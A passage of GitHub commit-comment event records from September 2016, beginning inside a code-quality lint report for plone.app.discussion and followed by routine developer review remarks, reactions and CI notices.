quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:429:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:430:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:431:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:487:63: S001 found %s formatter\nplone/app/discussion/tests/test_contentrules.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_contentrules.py:6:1: F401 'notify' imported but unused\nplone/app/discussion/tests/test_contentrules.py:22:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_contentrules.py:51:24: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:52:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:53:31: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:54:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:59:5: E303 too many blank lines (2)\nplone/app/discussion/tests/test_contentrules.py:117:38: S001 found %s formatter\nplone/app/discussion/tests/test_contentrules.py:121:38: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:122:34: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:123:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_contentrules.py:126:9: F841 local variable 'new_re_id' is assigned to but never used\nplone/app/discussion/tests/test_contentrules.py:135:35: E127 continuation line over-indented for visual indent\nplone/app/discussion/tests/test_contentrules.py:145:44: E127 continuation line over-indented for visual indent\nplone/app/discussion/tests/test_controlpanel.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_controlpanel.py:36:18: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_controlpanel.py:43:56: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_controlpanel.py:92:5: F811 redefinition of unused 'test_edit_comment_enabled' from line 84\nplone/app/discussion/tests/test_controlpanel.py:145:5: E265 block comment should start with '# '\nplone/app/discussion/tests/test_conversation.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_conversation.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_conversation.py:31:1: B901 blind except: statement\nplone/app/discussion/tests/test_conversation.py:91:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:93:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:94:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_conversation.py:95:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_conversation.py:96:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_conversation.py:96:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:97:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_conversation.py:518:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_conversation.py:560:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:565:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:570:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:575:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_conversation.py:969:38: S001 found %s formatter\nplone/app/discussion/tests/test_conversation.py:973:38: S001 found %s formatter\nplone/app/discussion/tests/test_conversation.py:978:38: S001 found %s formatter\nplone/app/discussion/tests/test_events.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_events.py:15:1: E302 expected 2 blank lines, found 0\nplone/app/discussion/tests/test_events.py:26:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:29:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:32:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:35:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:40:1: E302 expected 2 blank lines, found 0\nplone/app/discussion/tests/test_events.py:81:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_events.py:99:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/tests/test_events.py:138:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_events.py:151:38: S001 found %s formatter\nplone/app/discussion/tests/test_events.py:157:9: F841 local variable 'new_re_id' is assigned to but never used\nplone/app/discussion/tests/test_events.py:171:38: S001 found %s formatter\nplone/app/discussion/tests/test_functional.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_indexers.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_indexers.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_indexers.py:54:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:55:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:62:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:63:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:70:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:71:36: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:110:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_indexers.py:112:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_indexers.py:139:27: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:140:31: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:170:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_indexers.py:170:41: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_migration.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_migration.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_migration.py:55:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_migration.py:68:14: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_migration.py:214:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_moderation_view.py:111:38: S001 found %s formatter\nplone/app/discussion/tests/test_moderation_view.py:119:38: S001 found %s formatter\nplone/app/discussion/tests/test_moderation_view.py:127:38: S001 found %s formatter\nplone/app/discussion/tests/test_notifications.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_notifications.py:37:42: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:64:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:86:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:87:13: S001 found % formatter\nplone/app/discussion/tests/test_notifications.py:102:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:130:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:146:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:151:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:176:42: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:227:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_notifications.py:228:13: S001 found % formatter\nplone/app/discussion/tests/test_notifications.py:234:13: S001 found % formatter\nplone/app/discussion/tests/test_notifications.py:238:13: S001 found % formatter\nplone/app/discussion/tests/test_tool.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_tool.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_tool.py:32:31: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_tool.py:42:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_tool.py:43:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_tool.py:43:15: S001 found %s formatter\nplone/app/discussion/tests/test_workflow.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_workflow.py:58:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_workflow.py:94:27: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_workflow.py:133:38: S001 found %s formatter\nplone/app/discussion/tests/test_workflow.py:153:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_workflow.py:154:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_workflow.py:203:38: S001 found %s formatter\nplone/app/discussion/browser/captcha.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/captcha.py:64:39: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/browser/comment.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/comment.py:45:19: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:45:20: S001 found %s formatter\nplone/app/discussion/browser/comment.py:47:41: S001 found %s formatter\nplone/app/discussion/browser/comment.py:53:10: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:79:9: T002 import for ipdb found as ipdb\nplone/app/discussion/browser/comment.py:79:20: E702 multiple statements on one line (semicolon)\nplone/app/discussion/browser/comment.py:79:22: T002 trace method for ipdb found as set_trace\nplone/app/discussion/browser/comment.py:84:9: F841 local variable 'can_edit_own' is assigned to but never used\nplone/app/discussion/browser/comment.py:96:52: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:99:40: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:99:58: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:113:1: E265 block comment should start with '# '\nplone/app/discussion/browser/comments.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/comments.py:94:39: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:100:35: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:128:41: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:129:41: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:130:42: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:132:1: C901 'CommentForm.handleComment' is too complex (15)\nplone/app/discussion/browser/comments.py:141:32: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:142:32: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:157:16: E713 test for membership should be 'not in'\nplone/app/discussion/browser/comments.py:210:53: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:251:19: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:252:22: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:275:13: W503 line break before binary operator\nplone/app/discussion/browser/comments.py:276:13: W503 line break before binary operator\nplone/app/discussion/browser/comments.py:325:39: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:328:41: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:336:41: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:344:37: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:415:20: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:415:21: S001 found %s formatter\nplone/app/discussion/browser/comments.py:462:17: S001 found %s formatter\nplone/app/discussion/browser/controlpanel.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/controlpanel.py:34:10: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:90:55: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:91:48: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:96:55: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:97:40: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:97:41: S001 found %s formatter\nplone/app/discussion/browser/controlpanel.py:113:46: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:119:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:126:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:128:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:131:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:135:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:141:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:168:46: Q000 Remove bad quotes.\nplone/app/discussion/browser/conversation.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/browser/conversation.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/conversation.py:20:1: B901 blind except: statement\nplone/app/discussion/browser/conversation.py:32:1: C901 'ConversationView._enabled_for_archetypes' is too complex (14)\nplone/app/discussion/browser/conversation.py:138:12: P002 found \"hasattr\", consider replacing it\nplone/app/discussion/browser/conversation.py:138:29: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/browser/migration.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/migration.py:37:1: C901 'View.__call__' is too complex (32)\nplone/app/discussion/browser/migration.py:44:19: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:48:16: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:80:26: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:82:31: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:83:22: S001 found %s formatter\nplone/app/discussion/browser/migration.py:181:25: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:181:26: S001 found %s formatter\nplone/app/discussion/browser/migration.py:191:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:191:20: S001 found %s formatter\nplone/app/discussion/browser/migration.py:205:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:205:20: S001 found %s formatter\nplone/app/discussion/browser/migration.py:206:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:206:20: S001 found %s formatter\nplone/app/discussion/browser/migration.py:207:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:207:20: S001 found %s formatter\nplone/app/discussion/browser/migration.py:209:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:210:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:228:21: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:229:31: S001 found %s formatter\nplone/app/discussion/browser/migration.py:237:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:238:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:239:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:239:28: S001 found %s formatter\nplone/app/discussion/browser/migration.py:246:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:248:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:249:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:250:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:252:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:253:13: S001 found % formatter\nplone/app/discussion/browser/migration.py:257:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:257:18: S001 found %s formatter\nplone/app/discussion/browser/migration.py:261:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:262:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:266:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:267:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/moderation.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/moderation.py:100:15: Q000 Remove bad quotes.\nplone/app/discussion/browser/moderation.py:101:18: Q000 Remove bad quotes.\nplone/app/discussion/browser/moderation.py:141:15: Q000 Remove bad quotes.\nplone/app/discussion/browser/moderation.py:142:18: Q000 Remove bad quotes.\nplone/app/discussion/browser/traversal.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/browser/traversal.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/traversal.py:32:20: Q000 Remove bad quotes.\nplone/app/discussion/browser/validator.py:0:1: I001 isort found changes, run it on the file\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-30T10:35:38Z"}
{"id":"4642694567","type":"CommitCommentEvent","actor":{"login":"TheAndroidMaster"},"repo":{"name":"TheAndroidMaster/Status"},"payload":{"comment":{"id":19239102,"position":null,"line":null,"path":null,"commit_id":"df55970c61af7d1cfc0292aa7ca68a5f96c0c888","created_at":"2016-09-30T10:35:59Z","updated_at":"2016-09-30T10:35:59Z","body":"Want to know something? I didn't even test this before committing. I didn't even know if it worked, but I committed it anyway. This is going to be in the next update, I spent half an hour on this commit, and I didn't even test it. THAT'S HOW HARDCORE I AM LOOK AT ME NOT TESTING MY COMMITS I MUST BE A SUPER-PROGRAMMER DOING ALL THIS TYPING WITHOUT EVEN CHECKING MY WORK LOOK HOW BADASS I AM RIGHT NOW"}},"created_at":"2016-09-30T10:35:59Z"}
{"id":"4642703745","type":"CommitCommentEvent","actor":{"login":"willmclaren"},"repo":{"name":"Ensembl/VEP_plugins"},"payload":{"comment":{"id":19239120,"position":5,"line":74,"path":"ProteinSeqs.pm","commit_id":"76acff0ae95a47276ce369531e8fe14a25888c43","created_at":"2016-09-30T10:38:19Z","updated_at":"2016-09-30T10:38:19Z","body":"You'd have to import the warning_msg() method to use it. While there are benefits to using it in general, I think here it doesn't matter; the next time the person runs the script they can just remove --fork from their command line.\r\n\r\nThe way warning_msg() is used is changing in the future, so introducing it here would create more problems in the future than it solves now!"}},"created_at":"2016-09-30T10:38:19Z"}
{"id":"4642705140","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19239125,"position":null,"line":null,"path":null,"commit_id":"64bd08ab62c9d9bfac00001a27bb425719edf0d3","created_at":"2016-09-30T10:38:39Z","updated_at":"2016-09-30T10:38:39Z","body":"Good work, Keital. Thanks for the help :)"}},"created_at":"2016-09-30T10:38:39Z"}
{"id":"4642705753","type":"CommitCommentEvent","actor":{"login":"jem-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19239129,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T10:38:49Z","updated_at":"2016-09-30T10:38:49Z","body":":tada: "}},"created_at":"2016-09-30T10:38:49Z"}
{"id":"4642705973","type":"CommitCommentEvent","actor":{"login":"tde-banana-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19239130,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T10:38:52Z","updated_at":"2016-09-30T10:38:52Z","body":":postal_horn: "}},"created_at":"2016-09-30T10:38:52Z"}
{"id":"4642709269","type":"CommitCommentEvent","actor":{"login":"andreaiacono"},"repo":{"name":"andreaiacono/OpenCVDemo"},"payload":{"comment":{"id":19239136,"position":null,"line":null,"path":null,"commit_id":"e681aea13d35a2f9a0d3b12c1fb175a639813f2b","created_at":"2016-09-30T10:39:45Z","updated_at":"2016-09-30T10:39:45Z","body":"Hi Van,\r\nif you have any specific question, feel free to ask. \r\n\r\nAndrea"}},"created_at":"2016-09-30T10:39:45Z"}
{"id":"4642710076","type":"CommitCommentEvent","actor":{"login":"simonnandra1992"},"repo":{"name":"CyanogenMod/cm_platform_sdk"},"payload":{"comment":{"id":19239139,"position":6,"line":103,"path":"cm/res/res/values-gl-rES/strings.xml","commit_id":"2f32195b3a657b009361236ca3cacc5301b4cca1","created_at":"2016-09-30T10:39:58Z","updated_at":"2016-09-30T10:39:58Z","body":"9780061430\r\n"}},"created_at":"2016-09-30T10:39:58Z"}
{"id":"4642712243","type":"CommitCommentEvent","actor":{"login":"simonnandra1992"},"repo":{"name":"CyanogenMod/cm_platform_sdk"},"payload":{"comment":{"id":19239146,"position":59,"line":156,"path":"cm/res/res/values-gl-rES/strings.xml","commit_id":"2f32195b3a657b009361236ca3cacc5301b4cca1","created_at":"2016-09-30T10:40:31Z","updated_at":"2016-09-30T10:40:31Z","body":"C hifkxo"}},"created_at":"2016-09-30T10:40:31Z"}
{"id":"4642714051","type":"CommitCommentEvent","actor":{"login":"tivisse"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19239148,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T10:40:59Z","updated_at":"2016-09-30T10:40:59Z","body":":metal: "}},"created_at":"2016-09-30T10:40:59Z"}
{"id":"4642714124","type":"CommitCommentEvent","actor":{"login":"simonnandra1992"},"repo":{"name":"CyanogenMod/cm_platform_sdk"},"payload":{"comment":{"id":19239149,"position":1,"line":98,"path":"cm/res/res/values-sv/strings.xml","commit_id":"2f32195b3a657b009361236ca3cacc5301b4cca1","created_at":"2016-09-30T10:41:01Z","updated_at":"2016-09-30T10:41:01Z","body":"Rajvir kaur\r\n"}},"created_at":"2016-09-30T10:41:01Z"}
{"id":"4642717332","type":"CommitCommentEvent","actor":{"login":"mightyiam"},"repo":{"name":"yarom-and-shahar/rxjs-playground"},"payload":{"comment":{"id":19239158,"position":18,"line":18,"path":"debounce.js","commit_id":"aecc3f10366414dcb1f5efc3605f7b8fdffe88c9","created_at":"2016-09-30T10:41:51Z","updated_at":"2016-09-30T10:41:51Z","body":"@yarom82 this is what we were missing. See the third argument:\r\nhttps://github.com/Reactive-Extensions/RxJS/blob/master/doc/api/core/operators/fromevent.md#rxobservablefromeventelement-eventname-selector\r\n\r\nData in observables is a single argument.\r\nThe selector is our chance to map multiple arguments to a single argument."}},"created_at":"2016-09-30T10:41:51Z"}
{"id":"4642722928","type":"CommitCommentEvent","actor":{"login":"juliepromact"},"repo":{"name":"Promact/slack-erp-custom-integration-mvc"},"payload":{"comment":{"id":19239170,"position":null,"line":null,"path":null,"commit_id":"52b2a3dec8d8a75c7ca186162e90444f530ad330","created_at":"2016-09-30T10:43:14Z","updated_at":"2016-09-30T10:43:14Z","body":"No Sir, it would not take too much amount of time."}},"created_at":"2016-09-30T10:43:14Z"}
{"id":"4642726685","type":"CommitCommentEvent","actor":{"login":"mightyiam"},"repo":{"name":"yarom-and-shahar/rxjs-playground"},"payload":{"comment":{"id":19239181,"position":4,"line":4,"path":"debounce.js","commit_id":"aecc3f10366414dcb1f5efc3605f7b8fdffe88c9","created_at":"2016-09-30T10:44:13Z","updated_at":"2016-09-30T10:44:13Z","body":"I don't know what this does. In that same StackOverflow question there was [another answer](http://stackoverflow.com/a/37093823/359072) which seems simpler. Perhaps using a newer Node.js API. So I used what's shown there."}},"created_at":"2016-09-30T10:44:13Z"}
{"id":"4642728737","type":"CommitCommentEvent","actor":{"login":"glogiotatidis"},"repo":{"name":"mozmar/status.mozmar.org"},"payload":{"comment":{"id":19239186,"position":null,"line":null,"path":null,"commit_id":"e82a591df02c63654db3d6d6f91dcba7a4288996","created_at":"2016-09-30T10:44:46Z","updated_at":"2016-09-30T10:44:46Z","body":"Hey @pmac I removed standup NR apps from the EE infra status board. Feel free to re-add them with appropriate group and name if they need to be here. Thanks!"}},"created_at":"2016-09-30T10:44:46Z"}
{"id":"4642736473","type":"CommitCommentEvent","actor":{"login":"matthiasbeyer"},"repo":{"name":"matthiasbeyer/imag"},"payload":{"comment":{"id":19239201,"position":5,"line":670,"path":"libimagstore/src/store.rs","commit_id":"caa214f1bdcdf29f20bd818ed997b3f4eada64db","created_at":"2016-09-30T10:46:43Z","updated_at":"2016-09-30T10:46:43Z","body":"That's the point: I'm not sure this is semantically correct.\r\n\r\nWe should rather do a `if !old_id.exists() { return Err(_); }`, am I right?"}},"created_at":"2016-09-30T10:46:43Z"}
{"id":"4642739774","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19239210,"position":null,"line":null,"path":null,"commit_id":"9074b117d4c0e3575ae5c83e72f67de291aa572d","created_at":"2016-09-30T10:47:35Z","updated_at":"2016-09-30T10:47:35Z","body":"我们把10这个数字做成动态的吧。就能根据需求定制了。"}},"created_at":"2016-09-30T10:47:35Z"}
{"id":"4642741155","type":"CommitCommentEvent","actor":{"login":"tigerspring"},"repo":{"name":"tigerspring/https---github.com-tigerspring-bsdlabel"},"payload":{"comment":{"id":19239214,"position":null,"line":null,"path":null,"commit_id":"d4da53e69c21aa34350e3e33e16f531a4b935a40","created_at":"2016-09-30T10:47:54Z","updated_at":"2016-09-30T10:47:54Z","body":"测试添加数据成功"}},"created_at":"2016-09-30T10:47:54Z"}
{"id":"4642745140","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19239224,"position":null,"line":null,"path":null,"commit_id":"9074b117d4c0e3575ae5c83e72f67de291aa572d","created_at":"2016-09-30T10:48:54Z","updated_at":"2016-09-30T10:48:54Z","body":"好的，就这么办！\r\n\r\n\r\n\r\n发自我的小米手机\r\n在 狰狞的千里冰封 <notifications@github.com>，2016年9月30日 18:47写道：\r\n\r\n我们把10这个数字做成动态的吧。就能根据需求定制了。\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/icela/FriceEngine-CSharp/commit/9074b117d4c0e3575ae5c83e72f67de291aa572d#commitcomment-19239210>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ABcwrljKq3cmnmEZl9rvmes8pxkRCxJEks5qvOjIgaJpZM4KK0nt>.\r\n"}},"created_at":"2016-09-30T10:48:54Z"}
{"id":"4642747128","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19239231,"position":null,"line":null,"path":null,"commit_id":"cce913b70fd8fcefa16eda090f6113656250202d","created_at":"2016-09-30T10:49:24Z","updated_at":"2016-09-30T10:49:24Z","body":"@UniversalMediaServer/developers thinking of doing a release this weekend unless anyone objects"}},"created_at":"2016-09-30T10:49:24Z"}
{"id":"4642747899","type":"CommitCommentEvent","actor":{"login":"Nashatyrev"},"repo":{"name":"ether-camp/ethereum-harmony"},"payload":{"comment":{"id":19239235,"position":17,"line":36,"path":"src/main/java/com/ethercamp/harmony/Application.java","commit_id":"d7ad12e00a78324830b6c45c8673033a280549b8","created_at":"2016-09-30T10:49:36Z","updated_at":"2016-09-30T10:49:36Z","body":"This relies on the working directory and will not work with a standalone JAR e.g."}},"created_at":"2016-09-30T10:49:36Z"}
{"id":"4642748071","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19239236,"position":null,"line":null,"path":null,"commit_id":"701b876eb8e36f81f0ac799439eb5f00bcb5e73e","created_at":"2016-09-30T10:49:38Z","updated_at":"2016-09-30T10:49:38Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/33744/testReport/) for this commit**"}},"created_at":"2016-09-30T10:49:38Z"}
{"id":"4642752625","type":"CommitCommentEvent","actor":{"login":"rgaiacs"},"repo":{"name":"scipy-latinamerica/scipyla2017"},"payload":{"comment":{"id":19239247,"position":14,"line":330,"path":"docs/tracks.md","commit_id":"8f17150d2422cab0219a113cc60c1e3a2858995d","created_at":"2016-09-30T10:50:49Z","updated_at":"2016-09-30T10:50:49Z","body":"I don't think such word exists."}},"created_at":"2016-09-30T10:50:49Z"}
{"id":"4642753039","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19239248,"position":null,"line":null,"path":null,"commit_id":"60891490cd494375ec9e1585a7c3775a8a7ab42a","created_at":"2016-09-30T10:50:54Z","updated_at":"2016-09-30T10:50:54Z","body":"@Keital Where you said that part **void getPosInfo(uint32 &tilesX, uint32 &tilesY, Vector3 &corner) const;**"}},"created_at":"2016-09-30T10:50:54Z"}
{"id":"4642755733","type":"CommitCommentEvent","actor":{"login":"NicolasGrosjean"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":19239256,"position":null,"line":null,"path":null,"commit_id":"30696d3c2c5f780cd048f3721cc91d65482f41e1","created_at":"2016-09-30T10:51:34Z","updated_at":"2016-09-30T10:51:34Z","body":"I have a suggestion about The Henotikon (hist.7/8/9).\r\nIn the current state, if the player (or the IA?) choose the 2nd option, no flag is set.\r\nSo the event come back again until the 1st option is chosen or the year 482 is passed.\r\n\r\nIn my opinion, it is more logic to put the flag in the immediate bloc of the first event (hist.7).\r\nOr put 2 different in the 2 options if we need to differentiate this choice for other events.\r\nBy this way, the event is fire only one independently of the choice."}},"created_at":"2016-09-30T10:51:34Z"}
{"id":"4642756817","type":"CommitCommentEvent","actor":{"login":"Majikat"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19239260,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T10:51:51Z","updated_at":"2016-09-30T10:51:51Z","body":"Hurray !"}},"created_at":"2016-09-30T10:51:51Z"}
